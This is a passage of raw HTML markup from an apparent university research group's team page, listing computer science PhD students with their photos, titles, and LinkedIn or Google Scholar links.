data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image 